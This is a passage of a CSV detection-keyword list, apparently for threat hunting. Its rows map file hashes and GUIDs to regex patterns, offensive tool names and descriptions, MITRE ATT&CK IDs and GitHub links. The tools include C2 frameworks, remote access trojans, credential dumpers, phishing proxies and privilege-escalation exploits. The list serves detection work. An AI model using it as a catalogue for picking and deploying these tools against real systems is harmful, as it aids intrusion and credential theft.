fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","0","can also be used by blueteam as a honeypot","10","10","1434","239","2024-02-28T06:08:59Z","2018-09-07T19:17:41Z" "*A315E53B-397A-4074-B988-535A100D45DC*",".{0,1000}A315E53B\-397A\-4074\-B988\-535A100D45DC.{0,1000}","offensive_tool_keyword","PetitPotato","Local privilege escalation via PetitPotam (Abusing impersonate privileges)","T1134.005 - T1548.001","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/wh0amitz/PetitPotato","1","0","N/A","10","4","390","51","2023-03-30T10:45:00Z","2022-04-19T19:59:19Z" "*a315f75d50a2c54a6d1bb84cca077e6894870d8a1e60010ffd1307a295c8b9f7*",".{0,1000}a315f75d50a2c54a6d1bb84cca077e6894870d8a1e60010ffd1307a295c8b9f7.{0,1000}","offensive_tool_keyword","gosecretsdump","Dump ntds.dit really fast","T1003","TA0006","N/A","N/A","Credential Access","https://github.com/C-Sto/gosecretsdump","1","0","N/A","10","4","354","48","2021-10-01T09:11:33Z","2018-12-24T05:54:19Z" "*a324c19c7df7c2c63f4fc17bc8e1554e4261a27c18cd68c47cc08602f480d60f*",".{0,1000}a324c19c7df7c2c63f4fc17bc8e1554e4261a27c18cd68c47cc08602f480d60f.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","0","can also be used by blueteam as a honeypot","10","10","1434","239","2024-02-28T06:08:59Z","2018-09-07T19:17:41Z" "*a32cdeddc7deb6d2ac210ec304930da4e9c6763975d72685fd7108ad48883715*",".{0,1000}a32cdeddc7deb6d2ac210ec304930da4e9c6763975d72685fd7108ad48883715.{0,1000}","offensive_tool_keyword","SharpBuster","This is a C# implementation of a directory brute forcing tool designed to allow for in-memory execution","T1087 - T1112 - T1048.003 - T1105","TA0007 - TA0040 - 
TA0002","N/A","N/A","Discovery","https://github.com/passthehashbrowns/SharpBuster","1","0","N/A","7","1","60","7","2020-09-02T15:46:03Z","2020-08-31T00:33:02Z" "*a3546da8bf7e18eb991cf72b2d702c6b07997140959f9ef56ba64b2673bbd7fd*",".{0,1000}a3546da8bf7e18eb991cf72b2d702c6b07997140959f9ef56ba64b2673bbd7fd.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*A38C04C7-B172-4897-8471-E3478903035E*",".{0,1000}A38C04C7\-B172\-4897\-8471\-E3478903035E.{0,1000}","offensive_tool_keyword","DiskCryptor","DiskCryptor is an open source encryption solution that offers encryption of all disk partitions including system partitions","T1486 ","TA0040","N/A","N/A","Ransomware","https://github.com/DavidXanatos/DiskCryptor","1","0","N/A","10","5","417","103","2024-02-23T14:13:01Z","2019-04-20T14:51:18Z" "*a3adf686eebbb786431c1df3c1988eb013877596d162ed642fb7e52e285e7296*",".{0,1000}a3adf686eebbb786431c1df3c1988eb013877596d162ed642fb7e52e285e7296.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","0","can also be used by blueteam as a 
honeypot","10","10","1434","239","2024-02-28T06:08:59Z","2018-09-07T19:17:41Z" "*a3afae22698d3cb4d3f9fff03a42ccf61b3666bd6ef5c455ce6488b6788883a3*",".{0,1000}a3afae22698d3cb4d3f9fff03a42ccf61b3666bd6ef5c455ce6488b6788883a3.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*A3h1nt/gimmeSH*",".{0,1000}A3h1nt\/gimmeSH.{0,1000}","offensive_tool_keyword","gimmeSH","gimmeSH. is a tool that generates a custom cheatsheet for Reverse Shell. File Transfer and Msfvenom within your terminal. you just need to provide the platform. your Internet protocol address and your port number.","T1059 T1505","TA0002 - TA0003 - TA0008","N/A","N/A","Exploitation tools","https://github.com/A3h1nt/gimmeSH","1","1","N/A","N/A","2","183","29","2021-08-27T03:12:15Z","2021-08-02T07:22:15Z" "*a4284269b4058b687af441673ccc1a09dbd013d3dc54546848837ed44e0023af*",".{0,1000}a4284269b4058b687af441673ccc1a09dbd013d3dc54546848837ed44e0023af.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","0","can also be used by blueteam as a honeypot","10","10","1434","239","2024-02-28T06:08:59Z","2018-09-07T19:17:41Z" "*a43f8c6f567c0280ddb10660ab9a00f492741d3c4e668c2ca8ea171dc30cb083*",".{0,1000}a43f8c6f567c0280ddb10660ab9a00f492741d3c4e668c2ca8ea171dc30cb083.{0,1000}","offensive_tool_keyword","arsenal","Arsenal is just a quick inventory and 
launcher for hacking programs","T1596 - T1587","TA0042 - TA0001","N/A","N/A","Exploitation tools","https://github.com/Orange-Cyberdefense/arsenal","1","0","commands cheat sheets","8","10","N/A","N/A","N/A","N/A" "*a441bc5046ec91f60d5a185edbee6a17e309c87f3268bb9c45bb9c83bb28ec23*",".{0,1000}a441bc5046ec91f60d5a185edbee6a17e309c87f3268bb9c45bb9c83bb28ec23.{0,1000}","offensive_tool_keyword","SharpSploit","SharpSploit is a .NET post-exploitation library written in C# that aims to highlight the attack surface of .NET and make the use of offensive .NET easier for red teamers.","T1055 - T1086 - T1003 - T1053 - T1547 - T1110 - T1021 - T1070 - T1562 - T1574 - T1543 - T1098","TA0002 - TA0003 - TA0005 - TA0006 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/cobbr/SharpSploit","1","0","N/A","10","10","1692","303","2021-08-12T18:23:15Z","2018-09-20T14:22:37Z" "*A45C184F-F98F-4258-A928-BFF437034791*",".{0,1000}A45C184F\-F98F\-4258\-A928\-BFF437034791.{0,1000}","offensive_tool_keyword","ConfuserEx","ConfuserEx is a widely used open source obfuscator often found in malware","T1027 - T1045","TA0005 ","N/A","N/A","Defense Evasion","https://github.com/yck1509/ConfuserEx","1","0","N/A","6","10","3512","1595","2019-05-14T14:23:56Z","2014-03-28T07:00:26Z" "*a4635952ba5d7927ceb57a1533c38a7a55a4835de85c4794fa85d863866d5588*",".{0,1000}a4635952ba5d7927ceb57a1533c38a7a55a4835de85c4794fa85d863866d5588.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*A46C9A13-145E-42C0-8CA6-CC920BF1D9F1*",".{0,1000}A46C9A13\-145E\-42C0\-8CA6\-CC920BF1D9F1.{0,1000}","offensive_tool_keyword","prefetch-tool","Windows KASLR bypass using prefetch side-channel CVE-2024-21345 exploitation","T1564.007","TA0004","N/A","N/A","Privilege Escalation","https://github.com/exploits-forsale/prefetch-tool","1","0","N/A","8","1","47","7","2024-04-26T05:40:32Z","2024-04-26T05:00:27Z" "*a475f8e5b3581cb7b93cd3021478957ec5997aa3995c1a686fb87ae6c84ec2b1*",".{0,1000}a475f8e5b3581cb7b93cd3021478957ec5997aa3995c1a686fb87ae6c84ec2b1.{0,1000}","offensive_tool_keyword","dropper","Generates Malicious Office Macro Enabled Dropper for DLL SideLoading and Embed it in Lnk file to bypass MOTW","T1059 - T1574.002 - T1218 - T1559.003","TA0002 - TA0005 - TA0009","N/A","N/A","Resource Development","https://github.com/SaadAhla/dropper","1","0","N/A","10","3","209","47","2024-03-24T16:47:03Z","2024-03-24T16:36:46Z" "*a4cc9799fdba898f24de68be43dff98a9c8a153dbf016fdd042127e4b31bbc34*",".{0,1000}a4cc9799fdba898f24de68be43dff98a9c8a153dbf016fdd042127e4b31bbc34.{0,1000}","offensive_tool_keyword","Heroinn","A cross platform C2/post-exploitation framework implementation by Rust.","T1059 - T1547 - T1068 - T1562 - T1110 - T1083 - T1021 - T1071","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - 
TA0011","N/A","N/A","C2","https://github.com/b23r0/Heroinn","1","0","N/A","10","10","617","209","2022-10-08T07:27:38Z","2015-05-16T14:54:19Z" "*a4e7e725eb3998e5dadef0f903eb5e5f3e2b879876b239a891de5f95ecb2c1c4*",".{0,1000}a4e7e725eb3998e5dadef0f903eb5e5f3e2b879876b239a891de5f95ecb2c1c4.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*a4fee85a73d5192f1daa887e5357eb1304acd73425842f7ed690783c2a27a26f*",".{0,1000}a4fee85a73d5192f1daa887e5357eb1304acd73425842f7ed690783c2a27a26f.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*a50cefaf5e3c111224055a9e3e4d289c7c44dc0d8405bf96a52f8c6d254aaeca*",".{0,1000}a50cefaf5e3c111224055a9e3e4d289c7c44dc0d8405bf96a52f8c6d254aaeca.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*a52770362aceeca8d893ccb0fcfdf76991a94dc3e9cac0e595c897d1392dcaac*",".{0,1000}a52770362aceeca8d893ccb0fcfdf76991a94dc3e9cac0e595c897d1392dcaac.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*a5323adc6557587f17fc2766b95efbf76e5148dbc14b744cbf72b40bdc40f601*",".{0,1000}a5323adc6557587f17fc2766b95efbf76e5148dbc14b744cbf72b40bdc40f601.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*a56757ad65727fec369f36a7c892618170bcdf89c22712d1c4010899c6ae9239*",".{0,1000}a56757ad65727fec369f36a7c892618170bcdf89c22712d1c4010899c6ae9239.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*A5B912EC-D588-401C-A84F-D01F98142B9E*",".{0,1000}A5B912EC\-D588\-401C\-A84F\-D01F98142B9E.{0,1000}","offensive_tool_keyword","ConfuserEx","ConfuserEx is a widely used open source obfuscator often found in malware","T1027 - T1045","TA0005 ","N/A","N/A","Defense Evasion","https://github.com/yck1509/ConfuserEx","1","0","N/A","6","10","3512","1595","2019-05-14T14:23:56Z","2014-03-28T07:00:26Z" "*a5e673ab3d8d4159b611981668487376eb2c61e3e3715dea1b50ec18d64eef76*",".{0,1000}a5e673ab3d8d4159b611981668487376eb2c61e3e3715dea1b50ec18d64eef76.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*a5f10cdd2cd38b2b33a091c60f0e194aafd3a2de3ccbf80333882430a90034b6*",".{0,1000}a5f10cdd2cd38b2b33a091c60f0e194aafd3a2de3ccbf80333882430a90034b6.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*a60cd6fd8facc92366caa76747ede2aba9c04a166f55d1ae6b84b264d0f2e5b1*",".{0,1000}a60cd6fd8facc92366caa76747ede2aba9c04a166f55d1ae6b84b264d0f2e5b1.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*a63a403167d39341c7a116a1f8d599d19859743cbb254ba6203733213081913f*",".{0,1000}a63a403167d39341c7a116a1f8d599d19859743cbb254ba6203733213081913f.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*a63e1dbd23bbc640410dd811ab84e179b741080c4b4d8b5e08e5622d79884e38*",".{0,1000}a63e1dbd23bbc640410dd811ab84e179b741080c4b4d8b5e08e5622d79884e38.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*a644596787f407d005d3de5a3e02316c788b40dec8c5fdd0b4c010edc771677f*",".{0,1000}a644596787f407d005d3de5a3e02316c788b40dec8c5fdd0b4c010edc771677f.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*a6479f37d1ab80d878c949e10b1b44cd7714c87a67da40c438237af0501de51f*",".{0,1000}a6479f37d1ab80d878c949e10b1b44cd7714c87a67da40c438237af0501de51f.{0,1000}","offensive_tool_keyword","tor2web","Tor2web is an HTTP proxy software that enables access to Tor Hidden Services by mean of common web browsers","T1090 - T1071","TA0001 - TA0005","N/A","N/A","Defense Evasion","https://github.com/tor2web/Tor2web","1","0","N/A","9","7","684","175","2023-02-07T21:52:31Z","2011-12-17T15:14:02Z" "*A64EF001-BE90-4CF5-86B2-22DFDB49AE81*",".{0,1000}A64EF001\-BE90\-4CF5\-86B2\-22DFDB49AE81.{0,1000}","offensive_tool_keyword","xeno-rat","Xeno-RAT is an open-source remote access tool (RAT) developed in C# providing a comprehensive set of features for remote system management. 
Has features such as HVNC - live microphone - reverse proxy and much much more","T1133 - T1021.001 - T1563.002 - T1113 - T1123 - T1571 - T1090","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011","N/A","N/A","C2","https://github.com/moom825/xeno-rat","1","0","N/A","10","10","679","210","2024-03-05T06:22:36Z","2023-10-17T06:41:56Z" "*a650ad2f9d7d9ee450f8fd0926b0ec9512d02f2fbd96f4338549f5064519f9e6*",".{0,1000}a650ad2f9d7d9ee450f8fd0926b0ec9512d02f2fbd96f4338549f5064519f9e6.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*a6730ebb3e91961283f7a1cd95ace2a6d0d55e50531a64e57b03e61a8cf2d0e7*",".{0,1000}a6730ebb3e91961283f7a1cd95ace2a6d0d55e50531a64e57b03e61a8cf2d0e7.{0,1000}","offensive_tool_keyword","WDExtract","Extract Windows Defender database from vdm files and unpack it","T1059 - T1005 - T1119","TA0002 - TA0009 - TA0003","N/A","N/A","Defense Evasion","https://github.com/hfiref0x/WDExtract/","1","0","N/A","8","4","391","60","2020-02-10T06:53:43Z","2019-04-19T17:33:48Z" "*a6f37544d43d1d50d3a860e72e723079bb1fc7f7e956089cade9b41d1a585c2f*",".{0,1000}a6f37544d43d1d50d3a860e72e723079bb1fc7f7e956089cade9b41d1a585c2f.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" 
"*A7397316-0AEF-4379-B285-C276DE02BDE1*",".{0,1000}A7397316\-0AEF\-4379\-B285\-C276DE02BDE1.{0,1000}","offensive_tool_keyword","Perfusion","Exploit for the RpcEptMapper registry key permissions vulnerability (Windows 7 / 2088R2 / 8 / 2012)","T1068 - T1055 - T1548.002","TA0003 - TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/itm4n/Perfusion","1","0","N/A","10","5","405","74","2021-04-22T16:20:32Z","2021-02-11T18:28:22Z" "*a7469955bff5e489d2270d9b389064e1*",".{0,1000}a7469955bff5e489d2270d9b389064e1.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","0","N/A","10","10","76","45","2024-01-09T08:59:52Z","2021-01-20T13:03:45Z" "*a74bc97d32a17a7c5a401229100635b8aee9907da5b6e6c6641ae6af9a81b7f2*",".{0,1000}a74bc97d32a17a7c5a401229100635b8aee9907da5b6e6c6641ae6af9a81b7f2.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*a756ddc08156eddb07bdddea3cc3c75748f854e4c0388e90b17017fc55bc02b6*",".{0,1000}a756ddc08156eddb07bdddea3cc3c75748f854e4c0388e90b17017fc55bc02b6.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*a75a1abcf2235c58fdcd4a6dd7c7347eeec4a094696c255bc8d45026d2c94e6c*",".{0,1000}a75a1abcf2235c58fdcd4a6dd7c7347eeec4a094696c255bc8d45026d2c94e6c.{0,1000}","offensive_tool_keyword","OSEP-Code-Snippets","notable code snippets for Offensive Security's PEN-300 (OSEP) course","T1116 - T1204.002 - T1027.009 - T1021.005 - T1560.001 - T1100 - T1003.001 - T1564.001 - T1047 - T1210 - T1134.002 - T1055 - T1055.011 - T1055.012 - T1204","TA0005 - TA0040 - TA0008 - TA0003 - TA0006 - TA0004","N/A","N/A","Exploitation 
tools","https://github.com/chvancooten/OSEP-Code-Snippets","1","0","N/A","8","10","N/A","N/A","N/A","N/A" "*a77a13a5a04bd0753a883fbefab58bc0504cd151303e285bb3799d6c38196a30*",".{0,1000}a77a13a5a04bd0753a883fbefab58bc0504cd151303e285bb3799d6c38196a30.{0,1000}","offensive_tool_keyword","brutespray","BruteSpray takes nmap GNMAP/XML output or newline seperated JSONS and automatically brute-forces services with default credentials using Medusa. BruteSpray can even find non-standard ports by using the -sV inside Nmap.","T1110","TA0001 - TA0043","N/A","N/A","Credential Access","https://github.com/x90skysn3k/brutespray","1","0","N/A","10","10","1922","376","2024-04-30T13:32:24Z","2017-04-05T17:05:10Z" "*a785efdc2a95072fe9caece4fd872ae1f543777b60cce590a847180c3926a9b2*",".{0,1000}a785efdc2a95072fe9caece4fd872ae1f543777b60cce590a847180c3926a9b2.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*a78983b009b688a82458abac952516db57dc7eb3118a35cc737dde29c7b87ec4*",".{0,1000}a78983b009b688a82458abac952516db57dc7eb3118a35cc737dde29c7b87ec4.{0,1000}","offensive_tool_keyword","REC2 ","REC2 (Rusty External Command and Control) is client and server tool allowing auditor to execute command from VirusTotal and Mastodon APIs written in Rust.","T1105 - T1132 - T1071.001","TA0011 - TA0009 - 
TA0002","N/A","N/A","C2","https://github.com/g0h4n/REC2","1","0","N/A","10","10","126","18","2024-02-22T14:02:24Z","2023-09-25T20:39:59Z" "*a78d737f30e03d166d4e3e3b2dca71d54f1cbf582206dfe16a1e717ce3dc0ef7*",".{0,1000}a78d737f30e03d166d4e3e3b2dca71d54f1cbf582206dfe16a1e717ce3dc0ef7.{0,1000}","offensive_tool_keyword","stowaway","Stowaway -- Multi-hop Proxy Tool for pentesters","T1021 - T1090 - T1071 - T1573","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/ph4ntonn/Stowaway","1","0","N/A","10","10","2419","382","2024-04-11T05:50:18Z","2019-11-15T03:25:50Z" "*a7a5c912263b0207145bd9c2397a4fa338ec82217df2ab83471bb884e473cc9e*",".{0,1000}a7a5c912263b0207145bd9c2397a4fa338ec82217df2ab83471bb884e473cc9e.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0002 - TA0003 - TA0008","N/A","N/A","Sniffing & Spoofing","https://github.com/An0nUD4Y/evilginx2","1","0","file_hash","10","1","69","16","2024-04-24T19:24:31Z","2020-07-10T06:01:11Z" "*a7ab668cab3a63df4a03cc53c46eed13fbb13bf1*",".{0,1000}a7ab668cab3a63df4a03cc53c46eed13fbb13bf1.{0,1000}","offensive_tool_keyword","GhostTask","Creates scheduled tasks with a restrictive security descriptor - making them invisible to all users. - Establishes scheduled tasks directly via the registry - bypassing the generation of standard Windows event logs. - Provides support to modify existing scheduled tasks without generating Windows event logs. - Supports remote scheduled task creation (by using specially crafted Silver Ticket). - Supports to run in C2 with in-memory PE execution module (e.g. 
